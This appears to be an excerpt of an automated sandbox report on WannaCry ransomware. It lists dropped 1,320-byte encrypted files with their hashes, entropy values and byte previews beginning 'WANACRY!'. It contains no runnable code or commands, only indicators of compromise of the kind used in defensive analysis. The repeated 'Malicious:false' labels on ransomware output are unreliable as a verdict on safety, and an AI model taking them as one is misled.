                                                                              SHA-512:62D19AC2C8DB56064D3EA13166D1E37C568C7E448DD8EE72D8CF6ECDB0E2EB809BA19CFB6EB1DBCD978EA4A4519EFFDDFAE0E9666C62133D59A302A89CD8644E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....H"..5.#..n.....3D..........?...}P...7.]....3..&.-9.q....%4..{...X.a.AL....*....y.,....N.....f../eK%7. ..sR..U.Tbi..G..L<idv.o......T[.O.lE.N...f..g.....j.i./......>R.#.@6.....x...^..6...!.0.*.9.1I..Co:.|.......A...Q.ih<. ..a.,b...v..3.erUOa.[2.!.G.............j..V..U..).r...+.y..y..xC.c.pSk.Na.k..x.z....rM..E..&+....d..*.O>.@E.6;K_5_... .t.Mb.X`..0.6.......p.y.g....2d.Z^.....R2D..gh/Ju....l..H...PR.s....a}b..$G.F...4u.o..U.o.......BG.y..Km.C.j!9..4..?.?...fh...].j....U.....Q............(......plUuf..S/_..S./s..2..d."...M.ctz.....D..Y8.W!..9X,...<6.....+x..X...*....@.B..a..C..H0./..@.j.$Xx..~.u.<z..m..w7..z;.@..nV-.t.i/i..iz.;OqP...rQ..~.![.0....2.^]...N.3`.mq/<.:*....!\(+.([..X.@w?...V..TK.{DLW...n..Hl...f%...M./C..".vNJ.....!...N.`..V.TB;.U'%<........7.K...m.#yk:.gj.O..,.d|....Sp.Z.......#..% ....0l....=\*PK3l<..z.P.#E..W?.X..a}....]U......K[.Ar..-.:......h..x..".....Q.....;a....H)0............./. &.u..d.?.....l}.7J.#.p..\...S
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831692637740091
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8UxlgZit+4V0foUOHjeIbBM50ZXn+D9Pa4RDwXRfFSMiHHGvxFLreMW8Q3:bk9rgZOqf4jtbM0EJPa4NwXRdSMiHHWK
                                                                              MD5:51ACDE5996AD041AFD7630A531165548
                                                                              SHA1:67BF27232C8749007A480FD607CA958A3EBDB5ED
                                                                              SHA-256:24E099ED5561DD95FD2F211FA3A336DAB85DD6F7EFE3B064C2E9D665391C61E4
                                                                              SHA-512:CDD4508F22BD98BE093D0A49D46EF285383AB836C7BABB9910EC8B919A008BF64AE7B59DC72CB8899C993875BBC2E89C850D25A13E53CBB5F4D5231DAC65FF95
                                                                              Malicious:false
                                                                              Preview:WANACRY!....h]j....O..#Q........Q"..Y}.K..92-.'...8.....,p...#.............(W:#.{..)..xGP.3S.....Wm..H.c{....T.@...iu+I...8k..<Ca.....qj(.$..#..7{.C.+Y..."c..B...5...T..{.....2.Oz....e........)>....2..BlI\.....e..|.O`.......5.N&........%`BP.3..p.%......C..............+..v.GsP1.6.U.B.bx.\..'a..{.xsw...$..6.|....AH.......{....Q.........W!v`o....RV.h..p..Dy4.....w^...b.....6Dc...B....C`.h..{.....v......L..\i...^..0..mm...&.$.y.a.~YUO....J....x....._.Y..^.SQ.6]...Z.k+.GP.p...d.....xZ..>...U.g...O...).R....m....b.O....>PU..l.8'...tx ....jr..T.....#.U..S.vFx..;D..n+u.!p.y....8......$...Z1...H.....q..n@<....E:..m..,..9..,...B.%e....*.Zz..w.En~.s.)..C...d..d.C..8X#nJ..'S.u..5(.i..u."..Y...A2:.....E...t....K*H..9...I,Sr...e..9.]..W.P.....t.!t......v$.pU..D...4Bfm..\/#.K.V....(._....G.8..x...`..&.S9..s...$....(u.b.CqlO.....vp.m.9.FKZ.,.v.._.4.+PPV.......b\........5....H...F..i.,..4.2.....B.@.L.'.d.JX(.jz1}....O...1X;\..BL...f..{.|._`J...a......4...*..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831692637740091
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk8UxlgZit+4V0foUOHjeIbBM50ZXn+D9Pa4RDwXRfFSMiHHGvxFLreMW8Q3:bk9rgZOqf4jtbM0EJPa4NwXRdSMiHHWK
                                                                              MD5:51ACDE5996AD041AFD7630A531165548
                                                                              SHA1:67BF27232C8749007A480FD607CA958A3EBDB5ED
                                                                              SHA-256:24E099ED5561DD95FD2F211FA3A336DAB85DD6F7EFE3B064C2E9D665391C61E4
                                                                              SHA-512:CDD4508F22BD98BE093D0A49D46EF285383AB836C7BABB9910EC8B919A008BF64AE7B59DC72CB8899C993875BBC2E89C850D25A13E53CBB5F4D5231DAC65FF95
                                                                              Malicious:false
                                                                              Preview:WANACRY!....h]j....O..#Q........Q"..Y}.K..92-.'...8.....,p...#.............(W:#.{..)..xGP.3S.....Wm..H.c{....T.@...iu+I...8k..<Ca.....qj(.$..#..7{.C.+Y..."c..B...5...T..{.....2.Oz....e........)>....2..BlI\.....e..|.O`.......5.N&........%`BP.3..p.%......C..............+..v.GsP1.6.U.B.bx.\..'a..{.xsw...$..6.|....AH.......{....Q.........W!v`o....RV.h..p..Dy4.....w^...b.....6Dc...B....C`.h..{.....v......L..\i...^..0..mm...&.$.y.a.~YUO....J....x....._.Y..^.SQ.6]...Z.k+.GP.p...d.....xZ..>...U.g...O...).R....m....b.O....>PU..l.8'...tx ....jr..T.....#.U..S.vFx..;D..n+u.!p.y....8......$...Z1...H.....q..n@<....E:..m..,..9..,...B.%e....*.Zz..w.En~.s.)..C...d..d.C..8X#nJ..'S.u..5(.i..u."..Y...A2:.....E...t....K*H..9...I,Sr...e..9.]..W.P.....t.!t......v$.pU..D...4Bfm..\/#.K.V....(._....G.8..x...`..&.S9..s...$....(u.b.CqlO.....vp.m.9.FKZ.,.v.._.4.+PPV.......b\........5....H...F..i.,..4.2.....B.@.L.'.d.JX(.jz1}....O...1X;\..BL...f..{.|._`J...a......4...*..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848161301245785
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkYlTBv81fk3tvWQRa+ndV6Bx38awWCoCCDjSxNsQh9+WbhkoAgNVqqDW+yFe:bkelvksd+Q3VMx38arbDWxKQh43W9DWm
                                                                              MD5:61B62E75C494644B789F2F011F3EB329
                                                                              SHA1:8AA514281EBA37A28497F1890017D3071DFBA687
                                                                              SHA-256:67AF70A984E7015CC5A4A896BA985A8CCEA09D23D7DCAFC23F6A07D2F67B6B6E
                                                                              SHA-512:4DC2135E26E6E8E2AE089CD711C16E09B16F115CF799A3012925E0B5DE7D60EF541A6AC35ED3547ABD278B1A920B5580A48D87255B6A7E66CADB7FD2F3147E51
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....p.).;.......-........8g......rvL.....5..n...+.^,..a...j.....6._.[....;.v....4...V...2t;..O.,...l.e.c.E.M.D0...I,3..b...0...R...=...A*L..@...!.y!.....+..M.{V..o....ok...]F....8.m=\..).x...y..j]]..t-..?..(..d<>X.X.l^s4..~.c...._..pI6H.x.....Q.Ht..............l%o..O.f...q.(XnTW#....}.........n...#..f.t..4N.x......I.9B..0(.q..$ro*.......aF.M..<9..W.....K..F..)rH...E$...P..-.......Y$U.Jv;....cJ..i.@Z....Z........D..p>....FR.j.h.........H.`Is.T.....l|...'*..n..Z.5k..l6x.,.O...5*..1...Y..B....m...3.iIf.....k.....'h!...q...nb.........kv...h.._.)D..5].-.".H..`U........'.o@n.~.?......e..n.b......c.&..G....;.....p..B.........;....3...Y.!....4.W)L.^....j.%..;F....Y.-..Y...vA..Z.:..4.....Ow.'.]..j-...J.J.Q...._......o.........1{=]y.O.....G....B+.......3....>K0e[#./jg.D@.Y..U.....f.1g....d..J.F...B....(.X...|5{.....x.....'#..ba)7...<V.._.z....\..{].:\3(.h...w...>.....<.Cn.F5k.*R.....9.....8.%...(Cg.m.~ls...;.ZH..g{5....D....|J..........".........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848161301245785
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkYlTBv81fk3tvWQRa+ndV6Bx38awWCoCCDjSxNsQh9+WbhkoAgNVqqDW+yFe:bkelvksd+Q3VMx38arbDWxKQh43W9DWm
                                                                              MD5:61B62E75C494644B789F2F011F3EB329
                                                                              SHA1:8AA514281EBA37A28497F1890017D3071DFBA687
                                                                              SHA-256:67AF70A984E7015CC5A4A896BA985A8CCEA09D23D7DCAFC23F6A07D2F67B6B6E
                                                                              SHA-512:4DC2135E26E6E8E2AE089CD711C16E09B16F115CF799A3012925E0B5DE7D60EF541A6AC35ED3547ABD278B1A920B5580A48D87255B6A7E66CADB7FD2F3147E51
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....p.).;.......-........8g......rvL.....5..n...+.^,..a...j.....6._.[....;.v....4...V...2t;..O.,...l.e.c.E.M.D0...I,3..b...0...R...=...A*L..@...!.y!.....+..M.{V..o....ok...]F....8.m=\..).x...y..j]]..t-..?..(..d<>X.X.l^s4..~.c...._..pI6H.x.....Q.Ht..............l%o..O.f...q.(XnTW#....}.........n...#..f.t..4N.x......I.9B..0(.q..$ro*.......aF.M..<9..W.....K..F..)rH...E$...P..-.......Y$U.Jv;....cJ..i.@Z....Z........D..p>....FR.j.h.........H.`Is.T.....l|...'*..n..Z.5k..l6x.,.O...5*..1...Y..B....m...3.iIf.....k.....'h!...q...nb.........kv...h.._.)D..5].-.".H..`U........'.o@n.~.?......e..n.b......c.&..G....;.....p..B.........;....3...Y.!....4.W)L.^....j.%..;F....Y.-..Y...vA..Z.:..4.....Ow.'.]..j-...J.J.Q...._......o.........1{=]y.O.....G....B+.......3....>K0e[#./jg.D@.Y..U.....f.1g....d..J.F...B....(.X...|5{.....x.....'#..ba)7...<V.._.z....\..{].:\3(.h...w...>.....<.Cn.F5k.*R.....9.....8.%...(Cg.m.~ls...;.ZH..g{5....D....|J..........".........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848876515555292
                                                                              Encrypted:false
                                                                              SSDEEP:24:bklTSG7gUkK4xpuSaH4KKSu0w6U198fa9qnLiBDn8C0zsuoLjqYFKUXq2kvVthE9:bklTgTLxOnKp0X098f/nLUMz4Fzq2kv2
                                                                              MD5:F36A64A46FC4E5B8CAB75009C7BB24AF
                                                                              SHA1:02F9D897C00E3EEA91632EDD1CF93D7F8A3FE044
                                                                              SHA-256:66D3B359C5B58DA87C9DBE5F0969E47066B41FE5CA6971633385FE231B06C587
                                                                              SHA-512:8286D1A468E261FAF4A72476B5666CF8BEF0B5F21C86C76B9D00BCFF288AD9CEB4EA2A870731AF7224BCF71569FD2098345E70AC70BCCE13737BB78782999875
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Q.Bm.W@..*Q.W.C}i.l.@...=.7.g.m...o[$.e...4'..%..!..F.e.5...`u...D].\=..2rc...|...N.}f..x.@............hj..'?..F..*....b..&.B...-..sd.|...AS..o..8D....9...d..`.iY..I..tEj.A.W...@.])(}Wh.....;H..1...OGb..zb.vh..77......t...;.x..ij..p..W.!..Z..............j..A...........Q}e.."......Pe...n.=H{.6hs.+S..j.9....O..........qg.o..........F.e...X...... .].....Rl`....t.....q.:...q.E.V.I..OT..A ..YX...M...m..4.E....=..1[.q..a5......>......Q(...nn.d.tA....&.q.V..[....?..j"?'......i<{m&..:....{.. ;..F.6j.j\.Mh.x...a}....?..pN...c.Iy.V..?x8.khv.Ft........g,..)...T....-.....<N.+.U.p2./....8...p......<...n.&.U..V.U.......W]..J...m.............~.M.3....i..qt....q%.j ...u....FR....`k...~3.IF......)Y.V.Pw..P.x6....)".J.JJ......_./0...<..#../O)...gg.GCA...<......n.dSc.j.F ]..........2..f.o..El..Y8.a).!.P...Y..}..T#..t"q.`(.....A..w.;....bj)..a.....m.L.R.|t.X....y.A.:.{bW...(6]..J.UEA..e.*.bk..\.T......~.v/.0I^..\+.......t...`.......T.KF
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848876515555292
                                                                              Encrypted:false
                                                                              SSDEEP:24:bklTSG7gUkK4xpuSaH4KKSu0w6U198fa9qnLiBDn8C0zsuoLjqYFKUXq2kvVthE9:bklTgTLxOnKp0X098f/nLUMz4Fzq2kv2
                                                                              MD5:F36A64A46FC4E5B8CAB75009C7BB24AF
                                                                              SHA1:02F9D897C00E3EEA91632EDD1CF93D7F8A3FE044
                                                                              SHA-256:66D3B359C5B58DA87C9DBE5F0969E47066B41FE5CA6971633385FE231B06C587
                                                                              SHA-512:8286D1A468E261FAF4A72476B5666CF8BEF0B5F21C86C76B9D00BCFF288AD9CEB4EA2A870731AF7224BCF71569FD2098345E70AC70BCCE13737BB78782999875
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Q.Bm.W@..*Q.W.C}i.l.@...=.7.g.m...o[$.e...4'..%..!..F.e.5...`u...D].\=..2rc...|...N.}f..x.@............hj..'?..F..*....b..&.B...-..sd.|...AS..o..8D....9...d..`.iY..I..tEj.A.W...@.])(}Wh.....;H..1...OGb..zb.vh..77......t...;.x..ij..p..W.!..Z..............j..A...........Q}e.."......Pe...n.=H{.6hs.+S..j.9....O..........qg.o..........F.e...X...... .].....Rl`....t.....q.:...q.E.V.I..OT..A ..YX...M...m..4.E....=..1[.q..a5......>......Q(...nn.d.tA....&.q.V..[....?..j"?'......i<{m&..:....{.. ;..F.6j.j\.Mh.x...a}....?..pN...c.Iy.V..?x8.khv.Ft........g,..)...T....-.....<N.+.U.p2./....8...p......<...n.&.U..V.U.......W]..J...m.............~.M.3....i..qt....q%.j ...u....FR....`k...~3.IF......)Y.V.Pw..P.x6....)".J.JJ......_./0...<..#../O)...gg.GCA...<......n.dSc.j.F ]..........2..f.o..El..Y8.a).!.P...Y..}..T#..t"q.`(.....A..w.;....bj)..a.....m.L.R.|t.X....y.A.:.{bW...(6]..J.UEA..e.*.bk..\.T......~.v/.0I^..\+.......t...`.......T.KF
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848405019149157
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk50iIxmVATO2Pw6PD5Dr6UaprgLVhCObEkx8WptzEVFaHyz0qbvfsNc/nJGjlU2:bk5cTRN6UaCRhCo6FaHTGvVJGjT
                                                                              MD5:C1DB10A6AA79C9EA2842DEAEA88A3F12
                                                                              SHA1:010EA10059B21E51C35231F0099D0836335DFD4E
                                                                              SHA-256:51275E625E37F00D256429B80954A588A2CF65A481305C1D8FA0548799744782
                                                                              SHA-512:F5533450B05F85383F8B20937ACF6921EAFC14A2C37EB24933A3E6CF1A279BA3BC4DEE4EAB53FA4AB3D8BA2ADF6F671B181AA0B54199EDE84F290DBE61562620
                                                                              Malicious:false
                                                                              Preview:WANACRY!......d.E..-.l!..(.@7imX....v.].&.n|.....C......{n..}.E..._..O..a..#...........EP._.)......-...L....{6y\.........w..U...V..\...>h.|z.+..........1J.3..9.K...B:.8.\...B.....3.(...G.......t.E...I...<..h.....Q.*D..._..3..C.M.2"....o%=9...Q0..b....-....................1I+.k.a..PP..e..........y.%..B.q.......y.....(.;..K......2O.e.......g.|hr..B.h).Hj?.C..}.}z.....E.G....y.X..><^.K.... 0\.Cu...#m..S.w..t......e..n...DG..=..a|`s}..+5.{.%.i!....."o...Sn............/....o..z.\....E...<..vV.x..[.0....`.]......J..p.^..=.b@.l7....Z.C..........B.P9.15...N:C.fA9.;......5..)?.r._.b...v.].......As.x..@.:...T.k.K..q......[+/.x.g.b....:.o.../($@......H.L.]..).\..z.&g.=.*........U...$....N>a.Y.e.iR.&<...Qg.1Pr..NP..'.e],..*l.....cu...9B...p...........opb.?.EZ.Y...b..J..9<.....W.%1....:.b?...).+...R'R.Gg.Y.h.J.c..I.}..[Z..@_...|....!...A.N...K........X...r....u..H0X.U...g.....S(}.+O?.Q..N..fm^..p.Qr@L~.._..<w.[........z.32....w..w.R.)z....z..wz
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.848405019149157
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk50iIxmVATO2Pw6PD5Dr6UaprgLVhCObEkx8WptzEVFaHyz0qbvfsNc/nJGjlU2:bk5cTRN6UaCRhCo6FaHTGvVJGjT
                                                                              MD5:C1DB10A6AA79C9EA2842DEAEA88A3F12
                                                                              SHA1:010EA10059B21E51C35231F0099D0836335DFD4E
                                                                              SHA-256:51275E625E37F00D256429B80954A588A2CF65A481305C1D8FA0548799744782
                                                                              SHA-512:F5533450B05F85383F8B20937ACF6921EAFC14A2C37EB24933A3E6CF1A279BA3BC4DEE4EAB53FA4AB3D8BA2ADF6F671B181AA0B54199EDE84F290DBE61562620
                                                                              Malicious:false
                                                                              Preview:WANACRY!......d.E..-.l!..(.@7imX....v.].&.n|.....C......{n..}.E..._..O..a..#...........EP._.)......-...L....{6y\.........w..U...V..\...>h.|z.+..........1J.3..9.K...B:.8.\...B.....3.(...G.......t.E...I...<..h.....Q.*D..._..3..C.M.2"....o%=9...Q0..b....-....................1I+.k.a..PP..e..........y.%..B.q.......y.....(.;..K......2O.e.......g.|hr..B.h).Hj?.C..}.}z.....E.G....y.X..><^.K.... 0\.Cu...#m..S.w..t......e..n...DG..=..a|`s}..+5.{.%.i!....."o...Sn............/....o..z.\....E...<..vV.x..[.0....`.]......J..p.^..=.b@.l7....Z.C..........B.P9.15...N:C.fA9.;......5..)?.r._.b...v.].......As.x..@.:...T.k.K..q......[+/.x.g.b....:.o.../($@......H.L.]..).\..z.&g.=.*........U...$....N>a.Y.e.iR.&<...Qg.1Pr..NP..'.e],..*l.....cu...9B...p...........opb.?.EZ.Y...b..J..9<.....W.%1....:.b?...).+...R'R.Gg.Y.h.J.c..I.}..[Z..@_...|....!...A.N...K........X...r....u..H0X.U...g.....S(}.+O?.Q..N..fm^..p.Qr@L~.._..<w.[........z.32....w..w.R.)z....z..wz
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83776235760026
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjgjNvPXlpc2cS0BXpq+uvQkdGt9x6DRUaGn4YvVoD9vXYJZqc45J/s6oIcj8RL:bksjd/bcxtuvFEDYCnfW1YVZocjEL
                                                                              MD5:28CDECCEDA3C56389F59E5233DE912F4
                                                                              SHA1:B50D726902D22543E20AF54867029A8C3D52E372
                                                                              SHA-256:E8224383BF537C0E690BC6D98330E683DC7BB5AE6FB31D6D5A34C837FD5C546B
                                                                              SHA-512:53758C2C2829F0E1A75A22C22C28EF6225391EF50078FC2A2CBEB25BF04B185728ACC0D4127B6FE2BFA51B7BCCA6322CB582E06D65ECF6E89B78B084048298E9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....M.....na..F)z...`..0jMn.. %..._..tO....i6.,...zd'p.d]..2E.~409L.F....<`).#.HW.U.`.,.(@.}v...E...P....-.G...|.....\$e.......e@mW......5.1P..P.'....jG...i........T.i-!...FD..;?.5.z..T.z.....-Hj.d..CA....Ez*.8A....H.u..c. g.c.....(..|.......;.d....+I............~/5........,..k.B..T........5v..q....6-i..<=os4.."..>.%.Q.i`.u|.dpz4]]..;:]....o2'.O{ck...T.(...s..w.!.{.....F].VE.oIT.ngb...K).U.?..}...K.O..|7..G.........L.ue.w...p.\.V.'G.>.&....>.;...t..[j......5f..l..S.8....^.0..w...|Bp.6.Pc.kV'.....2.}...-..\....B-b...>j.2S..k..W..a....6.k.D.o........nB.j.!.~.q..W...E..23.:.mS...]}....`...O.....m...a`......:...L..-n.gOk/@............_.7.....JT..?..dh.T..!.N.Gv.E..d1.)...+...........kE.6.ql4Y.Z:....3..P...-5F...i.4..y.4..OO..#....H82.3...l....G!7...X..&i'.....G.>k..>"|.j7...f...bQ.....y....5.I...gy6UE.4..T^~..n.:...G\Ra.[6k@..^@....|.3.....^.[.6.q.....o3 ...2.b..*p.O..k@.....g(#+N^.b./.().8.....-....l"F..O.. `..Ty...w....m....6zD.9..D...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83776235760026
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkjgjNvPXlpc2cS0BXpq+uvQkdGt9x6DRUaGn4YvVoD9vXYJZqc45J/s6oIcj8RL:bksjd/bcxtuvFEDYCnfW1YVZocjEL
                                                                              MD5:28CDECCEDA3C56389F59E5233DE912F4
                                                                              SHA1:B50D726902D22543E20AF54867029A8C3D52E372
                                                                              SHA-256:E8224383BF537C0E690BC6D98330E683DC7BB5AE6FB31D6D5A34C837FD5C546B
                                                                              SHA-512:53758C2C2829F0E1A75A22C22C28EF6225391EF50078FC2A2CBEB25BF04B185728ACC0D4127B6FE2BFA51B7BCCA6322CB582E06D65ECF6E89B78B084048298E9
                                                                              Malicious:false
                                                                              Preview:WANACRY!....M.....na..F)z...`..0jMn.. %..._..tO....i6.,...zd'p.d]..2E.~409L.F....<`).#.HW.U.`.,.(@.}v...E...P....-.G...|.....\$e.......e@mW......5.1P..P.'....jG...i........T.i-!...FD..;?.5.z..T.z.....-Hj.d..CA....Ez*.8A....H.u..c. g.c.....(..|.......;.d....+I............~/5........,..k.B..T........5v..q....6-i..<=os4.."..>.%.Q.i`.u|.dpz4]]..;:]....o2'.O{ck...T.(...s..w.!.{.....F].VE.oIT.ngb...K).U.?..}...K.O..|7..G.........L.ue.w...p.\.V.'G.>.&....>.;...t..[j......5f..l..S.8....^.0..w...|Bp.6.Pc.kV'.....2.}...-..\....B-b...>j.2S..k..W..a....6.k.D.o........nB.j.!.~.q..W...E..23.:.mS...]}....`...O.....m...a`......:...L..-n.gOk/@............_.7.....JT..?..dh.T..!.N.Gv.E..d1.)...+...........kE.6.ql4Y.Z:....3..P...-5F...i.4..y.4..OO..#....H82.3...l....G!7...X..&i'.....G.>k..>"|.j7...f...bQ.....y....5.I...gy6UE.4..T^~..n.:...G\Ra.[6k@..^@....|.3.....^.[.6.q.....o3 ...2.b..*p.O..k@.....g(#+N^.b./.().8.....-....l"F..O.. `..Ty...w....m....6zD.9..D...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850849009792548
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkx4n30tDeB/0gu2zg4x5KxhmA2yQOIkCThDRlLG5rPNbFPn:bkankgMgu2zp+xAA2yQf9zlqV
                                                                              MD5:FA0F3D3D185282367652B66A7C81FC5F
                                                                              SHA1:715D21E9640CB591124BC52C0B7B9BD38F390E46
                                                                              SHA-256:BBE69C6EFC58FDA3A13F38A19AAFA57F6CF68165D05DEF62B9257C0ED8900846
                                                                              SHA-512:F29B7A8DD4293E2A0EC243A9A1F206D7E30E18B167236F3D4E0FAD039CB714C28F9FD9D99E22A19097223635F5177127A6D539DC19BFF851A61CF7BA39918CA0
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........~....4..Jy....b..q..[."=.~......p.....-?.....L".M[...Z....Im`u...(...>xA..2lA...U....-..(1Q.Y9?j...v...g.K.XVG.-...{.V[w......;.....".!.8.-%.t.........VQ....~....6..R#XR......$..PL.zE+f.k.*?..s."...<.....`Y..W.....[(v...G.-...U.....]................[..@~......g..:..."..=.Ue...h=.."...|*.X...7....FD..?.Ko.. A..0.........m.Q......k.. ..............G......+X..?<...m........n}..c8..0.W..f.......M........U.....#........Tv @..N./.,,..%...2^..Ftp........@..7.n.....>pV...?.vD.6..A.`..j...etAL..&f.%....D......&..uIi....4...Z./....r..../I..>..%..`...?.j.n.......y.rt.<..($...e.R../w.'....BN._.a.?.I....g..<....].Lx.Y.N.....N,..,.....,...O..k.2#f......~..r5`..B.X...g.$..........-.......y.,:.Q.c{..tB...d.....+?6.s...r!..mHX.....z...y.H...N$.{.:..Q...}.......Z.....^..Z.....s<.1["......D...X.gL..}.F....Z.~.o....VP.h.BMS.....l.Z.f.9%..7.1(..1.!.S.-.g....Q........l......u...X|".rR..{Yk.#.n....y...e.9...q.-a.{.,9.$...%n.....r...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850849009792548
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkx4n30tDeB/0gu2zg4x5KxhmA2yQOIkCThDRlLG5rPNbFPn:bkankgMgu2zp+xAA2yQf9zlqV
                                                                              MD5:FA0F3D3D185282367652B66A7C81FC5F
                                                                              SHA1:715D21E9640CB591124BC52C0B7B9BD38F390E46
                                                                              SHA-256:BBE69C6EFC58FDA3A13F38A19AAFA57F6CF68165D05DEF62B9257C0ED8900846
                                                                              SHA-512:F29B7A8DD4293E2A0EC243A9A1F206D7E30E18B167236F3D4E0FAD039CB714C28F9FD9D99E22A19097223635F5177127A6D539DC19BFF851A61CF7BA39918CA0
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........~....4..Jy....b..q..[."=.~......p.....-?.....L".M[...Z....Im`u...(...>xA..2lA...U....-..(1Q.Y9?j...v...g.K.XVG.-...{.V[w......;.....".!.8.-%.t.........VQ....~....6..R#XR......$..PL.zE+f.k.*?..s."...<.....`Y..W.....[(v...G.-...U.....]................[..@~......g..:..."..=.Ue...h=.."...|*.X...7....FD..?.Ko.. A..0.........m.Q......k.. ..............G......+X..?<...m........n}..c8..0.W..f.......M........U.....#........Tv @..N./.,,..%...2^..Ftp........@..7.n.....>pV...?.vD.6..A.`..j...etAL..&f.%....D......&..uIi....4...Z./....r..../I..>..%..`...?.j.n.......y.rt.<..($...e.R../w.'....BN._.a.?.I....g..<....].Lx.Y.N.....N,..,.....,...O..k.2#f......~..r5`..B.X...g.$..........-.......y.,:.Q.c{..tB...d.....+?6.s...r!..mHX.....z...y.H...N$.{.:..Q...}.......Z.....^..Z.....s<.1["......D...X.gL..}.F....Z.~.o....VP.h.BMS.....l.Z.f.9%..7.1(..1.!.S.-.g....Q........l......u...X|".rR..{Yk.#.n....y...e.9...q.-a.{.,9.$...%n.....r...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.817229185317741
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkXvPYOz6ruO/bn0YWzV+P5v60Z/fEXzv91MmuX0DsQ+Tn:bkXvAOz6H/jI4jXKv91MmuX2sQun
                                                                              MD5:B96648B5FB8AFE9FC3E55A5638D6FB0C
                                                                              SHA1:B7F5A6631BD16371BF787A5634FF1D3757EFF689
                                                                              SHA-256:343B4DD2AFDA6BC86A7D404D3A75261DE3F2B6B5AF27F6E845DF15F8000DE1C2
                                                                              SHA-512:4FD34347DEF1F17BFA5DF0E402709389428BE5EF45F3C2566A77255E6CC33A3A5CEC163F74C690DB215A248836D47A6FC2414BE8E8A5D33A18C112DD221B7CF0
                                                                              Malicious:false
                                                                              Preview:WANACRY!......c..j.O..X.H.o...l..p?3Zp..?...+.>...A...x.......O..T..z-..........32F.[...#.i,C......c..-.8;......9..x...!...[..E.......F.FJ....P...$:.^Ek./d.z<5,6.V...D.]\...R..>..q......U...0#...S..ex.t.}Q.+.YA|..S*.I...V]...3.q...w\......+...}....e.x?%............Hf.^..-5..`.[*5.G..Zk...4.7"O...)V...:...t.....Q..a...c...%.:.@.....2.....,>O[.ae....c._Y...T].[.?.n?I.|MN..#......P..........^w\N..N.VA.s.`.(n[.:.j<.N.QkS....2B.q.0.F..Xqj...\s?;.14q..|.........#(..p.........q.....hJ.......xt=vi..j.k..I....."..jafL...3..|{...4}.....C$9F\..."....L...^L.D.<...TANJ...FF..RK...l.O....x..3........@.....:uVFN.......l....../...,.a.n....g..m...N*.M"[.b,.....&+A..:t......?.Q.W.v....:.A..?}\.q.....!..+H.^2....1W........KX+U...Y4..T..z..\+..~."&...#.......2.n..4.4..._.E..H.T]^..b..Ip.LE...........jqV.#.h..U....z*..:gE#..Bj.y.....F.l.....Y4..H.....J.I..O....2qO.D9z...@RK.l9.y.C.....5...Hi.....UP..x9.r'.@.5... *s.9C.`.T.w......Z...t[-{,.. ...s..>...>.U.._..._.xZ.A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.817229185317741
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkXvPYOz6ruO/bn0YWzV+P5v60Z/fEXzv91MmuX0DsQ+Tn:bkXvAOz6H/jI4jXKv91MmuX2sQun
                                                                              MD5:B96648B5FB8AFE9FC3E55A5638D6FB0C
                                                                              SHA1:B7F5A6631BD16371BF787A5634FF1D3757EFF689
                                                                              SHA-256:343B4DD2AFDA6BC86A7D404D3A75261DE3F2B6B5AF27F6E845DF15F8000DE1C2
                                                                              SHA-512:4FD34347DEF1F17BFA5DF0E402709389428BE5EF45F3C2566A77255E6CC33A3A5CEC163F74C690DB215A248836D47A6FC2414BE8E8A5D33A18C112DD221B7CF0
                                                                              Malicious:false
